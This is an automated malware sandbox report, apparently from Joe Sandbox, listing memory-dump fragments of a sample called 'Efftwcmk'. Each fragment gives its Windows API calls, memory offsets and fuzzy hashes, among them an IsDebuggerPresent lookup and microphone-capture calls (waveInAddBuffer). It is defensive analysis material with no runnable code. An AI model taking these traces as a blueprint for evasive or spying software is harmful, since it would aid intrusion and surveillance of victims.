                                                      • Snapshot File: hcaresult_11_2_2c70000_Efftwcmk.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: AddressHandleModuleProc
                                                      • String ID: IsDebuggerPresent$KernelBase
                                                      • API String ID: 1646373207-2367923768
                                                      • Opcode ID: a1376f46d0cb8d0169993b9b0bc5e0d05bbbee50bb1b3e9f060260df271cb9c2
                                                      • Instruction ID: 2e89a98e8518ca0cc9ff562fe83876bd02efd8aabff94080599baec05aebe540
                                                      • Opcode Fuzzy Hash: a1376f46d0cb8d0169993b9b0bc5e0d05bbbee50bb1b3e9f060260df271cb9c2
                                                      • Instruction Fuzzy Hash: 64D012E2351B202EB60036F41CC482E02CC8949A2E3B04E72B02BD20D2E6B68A526710
                                                      APIs
                                                      • GetModuleHandleA.KERNEL32(kernel32.dll,?,02C9910B,00000000,02C9911E), ref: 02C7C3F2
                                                      • GetProcAddress.KERNEL32(00000000,GetDiskFreeSpaceExA,kernel32.dll,?,02C9910B,00000000,02C9911E), ref: 02C7C403
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.465570467.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_2c70000_Efftwcmk.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: AddressHandleModuleProc
                                                      • String ID: GetDiskFreeSpaceExA$kernel32.dll
                                                      • API String ID: 1646373207-3712701948
                                                      • Opcode ID: 219b7a50b14b1e86d84a6078d872226122f0ddaa08fc0e41743e5d8a448b0993
                                                      • Instruction ID: 95b831a1414e19cedd9d9fdc4aa2d8c3d9ae9c3a5172afe9cceeea0f8ef5db47
                                                      • Opcode Fuzzy Hash: 219b7a50b14b1e86d84a6078d872226122f0ddaa08fc0e41743e5d8a448b0993
                                                      • Instruction Fuzzy Hash: 6DD0C9F0A807475FF7006FB2688DB3226DC9B88348F50A976E41156102D7B2C66A9FDC
                                                      APIs
                                                      • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 02C7E20F
                                                      • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 02C7E22B
                                                      • SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 02C7E2A2
                                                      • VariantClear.OLEAUT32(?), ref: 02C7E2CB
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.465570467.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_2c70000_Efftwcmk.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ArraySafe$Bound$ClearIndexVariant
                                                      • String ID:
                                                      • API String ID: 920484758-0
                                                      • Opcode ID: 8aa00cc61b707ac15c9433f3790f772ad147275ad2ddf2cbfec09d81ee21ca74
                                                      • Instruction ID: 9c086bdbd0d1a91bb0f06f570b98651ba34f6b0c3ca377e5dd0e7ecfd973ee76
                                                      • Opcode Fuzzy Hash: 8aa00cc61b707ac15c9433f3790f772ad147275ad2ddf2cbfec09d81ee21ca74
                                                      • Instruction Fuzzy Hash: 86410876A012299BCB62EB58CC90BD9B3BDAF99314F0041D5E649E7252DB30AF809F50
                                                      APIs
                                                      • VirtualQuery.KERNEL32(?,?,0000001C), ref: 02C7ACD1
                                                      • GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 02C7ACF5
                                                      • GetModuleFileNameA.KERNEL32(02C70000,?,00000105), ref: 02C7AD10
                                                      • LoadStringA.USER32 ref: 02C7ADA6
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.465570467.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_2c70000_Efftwcmk.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: FileModuleName$LoadQueryStringVirtual
                                                      • String ID:
                                                      • API String ID: 3990497365-0
                                                      • Opcode ID: 140af53075128feb72b0ef990fabcfdcd240008add6e417d9a83f5ff0e0ce77b
                                                      • Instruction ID: 926b506ec6e8a7683f876b50c7830ea33533a3a699815006a2540584f00f23b4
                                                      • Opcode Fuzzy Hash: 140af53075128feb72b0ef990fabcfdcd240008add6e417d9a83f5ff0e0ce77b
                                                      • Instruction Fuzzy Hash: E4414B70A002589FDB21EB68CD84BDEB7FDAB18305F4040E9A648E7241DB749F88DF50
                                                      APIs
                                                      • VirtualQuery.KERNEL32(?,?,0000001C), ref: 02C7ACD1
                                                      • GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 02C7ACF5
                                                      • GetModuleFileNameA.KERNEL32(02C70000,?,00000105), ref: 02C7AD10
                                                      • LoadStringA.USER32 ref: 02C7ADA6
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.465570467.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_2c70000_Efftwcmk.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: FileModuleName$LoadQueryStringVirtual
                                                      • String ID:
                                                      • API String ID: 3990497365-0
                                                      • Opcode ID: 1f45811cf6c5c5103ef65edbfbceeba7ebec373099da6d7913b51efa9f3c0b79
                                                      • Instruction ID: 2f86eba4aaebbd4745cd58621a12d8847c998158fb34206fde59a3da604acb80
                                                      • Opcode Fuzzy Hash: 1f45811cf6c5c5103ef65edbfbceeba7ebec373099da6d7913b51efa9f3c0b79
                                                      • Instruction Fuzzy Hash: C9415970A00258AFDB21EB68CD84BDEB7FDAB18305F4040E9A648E7241DB749F88DF50
                                                      APIs
                                                      • CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000), ref: 2D23C49E
                                                      • GetFileSize.KERNEL32(00000000,00000000,00000000,?,?,00000000,2D22412F,2D285E74), ref: 2D23C4B2
                                                      • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 2D23C4D7
                                                      • CloseHandle.KERNEL32(00000000), ref: 2D23C4E5
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.470885800.000000002D220000.00000040.00000800.00020000.00000000.sdmp, Offset: 2D220000, based on PE: true
                                                      • Associated: 0000000B.00000002.470885800.000000002D294000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000000B.00000002.470885800.000000002D298000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_2d220000_Efftwcmk.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: File$CloseCreateHandleReadSize
                                                      • String ID:
                                                      • API String ID: 3919263394-0
                                                      • Opcode ID: d0e28248a11062e0c03599ee8ae30ebd627cce6bed41e7a451b9f8956437ab90
                                                      • Instruction ID: b8544643d820851cb84dbf6a0438aa2d21723e81b3a1131803a311cca3f303bf
                                                      • Opcode Fuzzy Hash: d0e28248a11062e0c03599ee8ae30ebd627cce6bed41e7a451b9f8956437ab90
                                                      • Instruction Fuzzy Hash: 3DF096F12853187FF7215E25AC88FBB376DEB8BAA8F010129FA01F22C0DA294D059135
                                                      APIs
                                                      • WideCharToMultiByte.KERNEL32(000000FF,00000000,00000006,00000001,?,?,00000000,?,00000000,?,?,00000000,00000006,?,?,?), ref: 2D269F0F
                                                      • GetLastError.KERNEL32 ref: 2D269F2B
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.470885800.000000002D220000.00000040.00000800.00020000.00000000.sdmp, Offset: 2D220000, based on PE: true
                                                      • Associated: 0000000B.00000002.470885800.000000002D294000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000000B.00000002.470885800.000000002D298000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_2d220000_Efftwcmk.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ByteCharErrorLastMultiWide
                                                      • String ID: Pk)-N)-
                                                      • API String ID: 203985260-771429351
                                                      • Opcode ID: a2bf4b0fa0b648c12abc62b07e8ed02ffff625be61777f3fda64f94c8a46585b
                                                      • Instruction ID: 5267f734867d98257bc64be94c55f3a4e1675bf816d427909d82acf645ef24e5
                                                      • Opcode Fuzzy Hash: a2bf4b0fa0b648c12abc62b07e8ed02ffff625be61777f3fda64f94c8a46585b
                                                      • Instruction Fuzzy Hash: 7F31B535680306EBCB1A9E55CD44FBB37A8EF51A50F11416AEA24BA281DE30DBC0C7F1
                                                      APIs
                                                      • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 2D26B7DB
                                                      • GetLastError.KERNEL32 ref: 2D26B804
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.470885800.000000002D220000.00000040.00000800.00020000.00000000.sdmp, Offset: 2D220000, based on PE: true
                                                      • Associated: 0000000B.00000002.470885800.000000002D294000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000000B.00000002.470885800.000000002D298000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_2d220000_Efftwcmk.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ErrorFileLastWrite
                                                      • String ID: Pk)-N)-
                                                      • API String ID: 442123175-771429351
                                                      • Opcode ID: 65ad3356d19ead9c3fb43c292b2a63a9fa8d05ea0d834103896613bb74851632
                                                      • Instruction ID: ed568556c105b0ab158a3e7292cb6cbd697c247e991924c98396e3ece685b028
                                                      • Opcode Fuzzy Hash: 65ad3356d19ead9c3fb43c292b2a63a9fa8d05ea0d834103896613bb74851632
                                                      • Instruction Fuzzy Hash: DE317176A103199BCB25CF59CC809DAB3F9FF88751F2085AAE509E7351E730A981CB60
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.465570467.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_2c70000_Efftwcmk.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 96fd4d1e1b5c626e910bcd346426052a30f342fcad695e5e463a2ca315ed8925
                                                      • Instruction ID: 2c2ac805180f7b5ab817e4a2ddadc2ef780f371e9106ba7be215c4b9631e6f8d
                                                      • Opcode Fuzzy Hash: 96fd4d1e1b5c626e910bcd346426052a30f342fcad695e5e463a2ca315ed8925
                                                      • Instruction Fuzzy Hash: FDA1F4B67106000BD719AA7D9C853BDB3C69BC4265F2C827EE11DCB381EBE9CA429750
                                                      APIs
                                                      • GetThreadLocale.KERNEL32(00000004,?,00000000,?,00000100,00000000,02C79552), ref: 02C794EA
                                                      • GetDateFormatA.KERNEL32(00000000,00000004,?,00000000,?,00000100), ref: 02C794F0
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.465570467.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_2c70000_Efftwcmk.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: DateFormatLocaleThread
                                                      • String ID: yyyy
                                                      • API String ID: 3303714858-3145165042
                                                      • Opcode ID: 1927837d3e8c49fc0db76fc60f9dd42cd24625c6bebb2991ebdab50bbbb3fde9
                                                      • Instruction ID: 6f4152d2e6a10940a38a28b22f9566e1f751fa0c3ba0c6c2a93fe3525d19a0e8
                                                      • Opcode Fuzzy Hash: 1927837d3e8c49fc0db76fc60f9dd42cd24625c6bebb2991ebdab50bbbb3fde9
                                                      • Instruction Fuzzy Hash: 5C218E71A002289FDB64DFA8C841AAEB3B9EF48710F5141A5E905E7340E734DF40EBA5
                                                      APIs
                                                      • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 2D26B6ED
                                                      • GetLastError.KERNEL32 ref: 2D26B716
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.470885800.000000002D220000.00000040.00000800.00020000.00000000.sdmp, Offset: 2D220000, based on PE: true
                                                      • Associated: 0000000B.00000002.470885800.000000002D294000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000000B.00000002.470885800.000000002D298000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_2d220000_Efftwcmk.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ErrorFileLastWrite
                                                      • String ID: Pk)-N)-
                                                      • API String ID: 442123175-771429351
                                                      • Opcode ID: 74159985956fc6b80f7b3299c0b25446cea06e8dd2154500062db1ec446417f6
                                                      • Instruction ID: cf3ec33dfeb16903b1388f804a1f30966a6d19615ccd9e1dfab86e30d2fc2268
                                                      • Opcode Fuzzy Hash: 74159985956fc6b80f7b3299c0b25446cea06e8dd2154500062db1ec446417f6
                                                      • Instruction Fuzzy Hash: 40218035A103199FCB25CF69CC80BDAB3F9FB48305F1444A9EA4AE7251D730AA81CB70
                                                      APIs
                                                        • Part of subcall function 2D268215: GetLastError.KERNEL32(?,2D25F720,2D25A7F5,2D25F720,2D294EF8,Pk)-N)-,2D25CE15,FF8BC35D,2D294EF8,2D294EF8), ref: 2D268219
                                                        • Part of subcall function 2D268215: _free.LIBCMT ref: 2D26824C
                                                        • Part of subcall function 2D268215: SetLastError.KERNEL32(00000000,?,?,00000000), ref: 2D26828D
                                                        • Part of subcall function 2D268215: _abort.LIBCMT ref: 2D268293
                                                      • _abort.LIBCMT ref: 2D26F0A9
                                                      • _free.LIBCMT ref: 2D26F0DD
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.470885800.000000002D220000.00000040.00000800.00020000.00000000.sdmp, Offset: 2D220000, based on PE: true
                                                      • Associated: 0000000B.00000002.470885800.000000002D294000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000000B.00000002.470885800.000000002D298000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_2d220000_Efftwcmk.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ErrorLast_abort_free
                                                      • String ID: Wk
                                                      • API String ID: 289325740-3902205105
                                                      • Opcode ID: 1826d1d86dd81db4c6959550e3448faddbad64c599a715053cb8a02ac0fdb52a
                                                      • Instruction ID: 548d854bf07b89dbb574d50c06dcbc81f7305efcac9766e6be5aec38d7326808
                                                      • Opcode Fuzzy Hash: 1826d1d86dd81db4c6959550e3448faddbad64c599a715053cb8a02ac0fdb52a
                                                      • Instruction Fuzzy Hash: 4601CE31D867328BCB22CF698C00269B770FF14B61F160269DA64732C0CB3429828FE1
                                                      APIs
                                                      • waveInPrepareHeader.WINMM(0068D080,00000020,?), ref: 2D221849
                                                      • waveInAddBuffer.WINMM(0068D080,00000020), ref: 2D22185F
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.470885800.000000002D220000.00000040.00000800.00020000.00000000.sdmp, Offset: 2D220000, based on PE: true
                                                      • Associated: 0000000B.00000002.470885800.000000002D294000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000000B.00000002.470885800.000000002D298000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_2d220000_Efftwcmk.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: wave$BufferHeaderPrepare
                                                      • String ID: XM)-
                                                      • API String ID: 2315374483-1445340508
                                                      • Opcode ID: 6dba14d924994ae01403ec336e4a4e1cc8689b3e2c7b54a24011fcada199267d
                                                      • Instruction ID: 376162e903da362f75ca5d3ac0c10f80b6880cc6d3457a4f710152d7392c3475
                                                      • Opcode Fuzzy Hash: 6dba14d924994ae01403ec336e4a4e1cc8689b3e2c7b54a24011fcada199267d
                                                      • Instruction Fuzzy Hash: 1101AD76701710BFD7208F24CC8CAA67BB9FF49A18B124139F615D3741EB396C108BA8
                                                      APIs
                                                      • GetSystemTimeAsFileTime.KERNEL32(00000000,2D25AAB7), ref: 2D268996
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.470885800.000000002D220000.00000040.00000800.00020000.00000000.sdmp, Offset: 2D220000, based on PE: true
                                                      • Associated: 0000000B.00000002.470885800.000000002D294000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000000B.00000002.470885800.000000002D298000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_2d220000_Efftwcmk.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Time$FileSystem
                                                      • String ID: GetSystemTimePreciseAsFileTime$Pk)-N)-
                                                      • API String ID: 2086374402-3309323792
                                                      • Opcode ID: 897f7c635c793565cec55d016110d32eee8efe0e1bb486c4079adc1a432c1c59
                                                      • Instruction ID: b39dcc96d110aee1d5f94b2ecc474e382112333584f542dae23ce9864d8066ba
                                                      • Opcode Fuzzy Hash: 897f7c635c793565cec55d016110d32eee8efe0e1bb486c4079adc1a432c1c59
                                                      • Instruction Fuzzy Hash: C1E0E571A8A318A7D721DB248C48E7EBB74DF59A11F054168FE0977384DA315E009AE9
                                                      APIs
                                                      • ___initconout.LIBCMT ref: 2D27555B
                                                        • Part of subcall function 2D276B1D: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000), ref: 2D276B30
                                                      • WriteConsoleW.KERNEL32 ref: 2D27557E
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.470885800.000000002D220000.00000040.00000800.00020000.00000000.sdmp, Offset: 2D220000, based on PE: true
                                                      • Associated: 0000000B.00000002.470885800.000000002D294000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000000B.00000002.470885800.000000002D298000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_2d220000_Efftwcmk.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ConsoleCreateFileWrite___initconout
                                                      • String ID: Pk)-N)-
                                                      • API String ID: 3087715906-771429351
                                                      • Opcode ID: 951eafa0153cb621a2ddf71720535ff2d4f0bdc20140cb8e1e99e9dbaece3f97
                                                      • Instruction ID: 1282dae125f091091577fe8f338cdf3ccdc320111402d6557c30917c03605dcc
                                                      • Opcode Fuzzy Hash: 951eafa0153cb621a2ddf71720535ff2d4f0bdc20140cb8e1e99e9dbaece3f97
                                                      • Instruction Fuzzy Hash: A3E0E5305841456BF620CB65CC09AB6737DEB01B74F500318FA24D72C0DB34E900C650
                                                      APIs
                                                      • MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,2D221D55), ref: 2D260D27
                                                      • GetLastError.KERNEL32 ref: 2D260D35
                                                      • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 2D260D90
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.470885800.000000002D220000.00000040.00000800.00020000.00000000.sdmp, Offset: 2D220000, based on PE: true
                                                      • Associated: 0000000B.00000002.470885800.000000002D294000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000000B.00000002.470885800.000000002D298000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_2d220000_Efftwcmk.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ByteCharMultiWide$ErrorLast
                                                      • String ID:
                                                      • API String ID: 1717984340-0
                                                      • Opcode ID: 6e7dd15b391e4842139a511ebf23995076313c57a58bba67dbe1b275e4804599
                                                      • Instruction ID: 707280b7f53c6b9cf5d2dd136cd5cabd09c1dd70ee565ff49b58e35ca7e1ffd0
                                                      • Opcode Fuzzy Hash: 6e7dd15b391e4842139a511ebf23995076313c57a58bba67dbe1b275e4804599
                                                      • Instruction Fuzzy Hash: 4C41E675684307AFCB118F65CD44BBA7BA4EF01350F2182A9F954B7291EB31A981DBF0
                                                      APIs
                                                      • IsBadReadPtr.KERNEL32(?,00000014,00000000,00000000,00000001,?,?,?,2D231EF0), ref: 2D231B8C
                                                      • IsBadReadPtr.KERNEL32(?,00000014,2D231EF0), ref: 2D231C58
                                                      • SetLastError.KERNEL32(0000007F), ref: 2D231C7A
                                                      • SetLastError.KERNEL32(0000007E,2D231EF0), ref: 2D231C91
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.470885800.000000002D220000.00000040.00000800.00020000.00000000.sdmp, Offset: 2D220000, based on PE: true
                                                      • Associated: 0000000B.00000002.470885800.000000002D294000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000000B.00000002.470885800.000000002D298000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_2d220000_Efftwcmk.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ErrorLastRead
                                                      • String ID:
                                                      • API String ID: 4100373531-0
                                                      • Opcode ID: ee0ec0b738be6e2a11bb1b9866f988e8152407341bec28f9bdded66676659064
                                                      • Instruction ID: e4e31fe806273662fb6603f4edf23d138324bd8f7eef65a328a2bc545960e23b
                                                      • Opcode Fuzzy Hash: ee0ec0b738be6e2a11bb1b9866f988e8152407341bec28f9bdded66676659064
                                                      • Instruction Fuzzy Hash: 0241ACB52443169FE7568F19DD84B36B3F9FF48714F00482DEA8AA7651EB31E904CB22
                                                      APIs
                                                      • IsBadReadPtr.KERNEL32(?,00000004,?,00000004,?,00000008), ref: 02C8A2EC
                                                      • IsBadWritePtr.KERNEL32(?,00000004,?,00000004,?,00000004,?,00000008), ref: 02C8A31C
                                                      • IsBadReadPtr.KERNEL32(?,00000008), ref: 02C8A33B
                                                      • IsBadReadPtr.KERNEL32(?,00000004,?,00000008), ref: 02C8A347
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.465570467.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_2c70000_Efftwcmk.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Read$Write
                                                      • String ID:
                                                      • API String ID: 3448952669-0
                                                      • Opcode ID: 6749dca09a2808ede702bf45426d7d81c710bbadfd288e5e0b265e135c720541
                                                      • Instruction ID: 5397204704ef7f1aab46e83f6446993daace211fdfa65c8aee27c9322e5ddbc3
                                                      • Opcode Fuzzy Hash: 6749dca09a2808ede702bf45426d7d81c710bbadfd288e5e0b265e135c720541
                                                      • Instruction Fuzzy Hash: 3A210671A407199BCB20EF69CC80BAEB3B9EF80765F508116EE5897340D734DD11DBA0